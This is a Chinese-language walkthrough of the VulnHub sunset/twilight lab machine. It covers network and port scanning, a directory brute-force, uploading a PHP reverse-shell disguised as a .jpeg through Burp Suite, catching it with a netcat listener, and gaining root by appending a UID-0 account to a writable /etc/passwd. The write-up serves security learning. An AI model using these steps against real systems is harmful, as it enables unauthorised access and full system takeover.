今天實踐的是vulnhub的sunset/twilight鏡像,
下載地址,https://download.vulnhub.com/sunset/twilight.7z,
先是用workstation導入,做地址掃描沒掃到地址,
于是又用virtualbox導入,重新做地址掃描,
sudo netdiscover -r 192.168.0.0/24,這回有地址了,191就是,

再繼續做端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.191,

有web服務,做一下目錄暴破,dirb http://192.168.0.191,

瀏覽器訪問http://192.168.0.191/gallery/index.php,

kali攻擊機上準備web反彈shell文件,
cp /usr/share/webshells/php/php-reverse-shell.php shell.php,
改好反彈的地址和端口,并改擴展名,mv shell.php shell.php.jpeg,
用burp suite上傳文件,并修改文件名,

上傳成功,

kali攻擊機上開個反彈shell監聽,nc -lvp 4444,
瀏覽器訪問http://192.168.0.191/gallery/original/shell.php,
反彈shell這就過來了,id確認不是root,需要提權,
查看到passwd文件是可寫的,ls -l /etc/passwd,
向里面添加一個root權限的賬號,
echo "hacker:sa3tHJ3/KuYvI:0:0:hacker:/root:/bin/bash" >> /etc/passwd,
切換賬號,su hacker,再id確認是root,

本期的實踐比較簡單,一般來說,普通賬戶不應該可寫passwd文件。
云計算和網絡安全技術實踐
云計算和網絡安全技術實踐
云計算和網絡安全技術實踐
云計算和網絡安全技術實踐
一顆小胡椒
系統安全運維
合天網安實驗室
Bypass
一顆小胡椒
LemonSec
Rot5pider安全團隊
RacentYY